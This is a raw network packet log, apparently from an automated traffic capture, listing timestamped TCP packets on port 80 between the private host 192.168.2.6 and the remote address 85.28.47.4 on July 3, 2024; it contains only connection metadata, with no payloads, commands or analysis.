                                                                Jul 3, 2024 08:38:11.599914074 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.599924088 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.599934101 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.599936008 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.599961042 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.599980116 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.600059032 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.600095034 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.600112915 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.600123882 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.600159883 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.600286007 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.600296974 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.600306988 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.600318909 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.600327969 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.600357056 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.600394964 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.600430965 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.600461960 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.600474119 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.600496054 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.600512028 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.600603104 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.600614071 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.600624084 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.600636005 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.600646973 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.600668907 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.603909016 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.603935003 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.603945017 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.603966951 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.603991032 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.604001999 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.604010105 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.604027033 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.604051113 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.604114056 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.604125977 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.604135990 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.604149103 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.604168892 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.604186058 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.604229927 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.604264975 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.604266882 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.604279041 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.604301929 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.604315996 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.604351044 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.604386091 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.604407072 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.604445934 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.604494095 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.604505062 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.604516029 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.604537964 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.604562044 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.604597092 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.604625940 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.604633093 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.604657888 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.604702950 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.604715109 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.604724884 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.604746103 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.604770899 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.604892015 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.604902983 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.604912996 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.604923964 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.604934931 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.604939938 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.604964972 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.604979038 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.605087996 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.605135918 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.605168104 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.605179071 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.605205059 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.605212927 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.605242968 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.605245113 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.605281115 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.605317116 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.605328083 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.605338097 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.605370045 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.605385065 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.605547905 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.605559111 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.605568886 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.605580091 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.605590105 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.605592012 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.605602980 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.605607033 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.605623007 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.605637074 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.605655909 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.605812073 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.605848074 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.605865955 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.605879068 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.605887890 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.605902910 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.605918884 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.605989933 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.606028080 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.606060028 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.606070995 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.606103897 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.606117964 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.606199026 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.606209993 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.606219053 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.606230021 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.606245041 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.606271029 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.606395960 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.606410027 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.606420994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.606441975 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.606462002 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.606523991 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.606534004 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.606544971 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.606559038 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.606573105 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.606586933 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.678755999 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.678774118 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.678786993 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.678829908 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.678841114 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.678852081 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.678852081 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.678863049 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.678932905 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.678932905 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.679023981 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.679076910 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.681674957 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.681688070 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.681698084 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.681735039 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.681760073 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.681782007 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.681792974 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.681839943 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.681839943 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.681955099 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.681966066 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.681977034 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.681989908 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.682029963 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.682030916 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.682215929 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.682228088 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.682238102 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.682249069 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.682259083 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.682267904 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.682267904 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.682317019 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.682317972 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.682512045 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.682523012 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.682539940 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.682552099 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.682559013 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.682562113 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.682574034 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.682579994 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.682621002 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.682621956 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.682861090 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.682914972 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.686470985 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.686499119 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.686508894 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.686527967 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.686557055 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.686558008 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.686630011 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.686641932 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.686651945 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.686697960 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.686697960 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.686765909 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.686777115 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.686794043 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.686805010 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.686815023 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.686825991 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.686826944 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.686826944 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.686857939 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.686878920 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.687063932 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.687083006 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.687114000 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.687139988 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.687232018 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.687244892 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.687253952 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.687264919 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.687275887 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.687282085 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.687287092 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.687299967 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.687303066 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.687309980 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.687319994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.687330961 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.687344074 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.687344074 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.687370062 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.687388897 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.687669039 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.687680960 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.687693119 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.687702894 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.687717915 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.687742949 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.687761068 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.690815926 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.690840960 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.690850973 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.690876007 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.690876007 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.690902948 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.690967083 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.690979004 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.690989017 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.690999031 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.691009998 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.691016912 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.691042900 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.691082001 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.691090107 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.691137075 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.691183090 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.691194057 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.691203117 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.691214085 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.691236019 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.691258907 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.691401005 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.691411972 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.691422939 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.691433907 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.691443920 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.691464901 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.691464901 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.691490889 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.691622972 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.691672087 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.691674948 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.691687107 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.691698074 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.691706896 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.691724062 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.691770077 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.691770077 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.691828012 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.691838980 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.691849947 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.691862106 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.691878080 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.691904068 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.691929102 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.692084074 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.692095995 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.692106009 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.692116976 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.692127943 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.692137957 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.692138910 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.692151070 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.692162037 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.692182064 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.692182064 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.692215919 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.692217112 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.692378998 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.692436934 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.692471981 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.692488909 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.692502022 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.692512035 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.692522049 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.692523003 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.692549944 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.692549944 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.692579985 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.692662954 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.692714930 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.692755938 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.692768097 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.692778111 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.692790031 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.692800999 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.692811012 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.692820072 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.692820072 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.692821980 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.692831993 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.692842960 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.692846060 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.692862034 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.692899942 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.693164110 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.693173885 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.693217039 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.693284035 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.693294048 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.693304062 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.693315029 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.693325043 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.693332911 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.693335056 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.693355083 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.693377018 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.765712023 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.765733004 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.765746117 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.765806913 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.765819073 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.765830994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.765844107 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.765861034 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.765949965 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.768563032 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.768610954 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.768624067 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.768642902 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.768675089 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.768762112 CEST804971085.28.47.4192.168.2.6
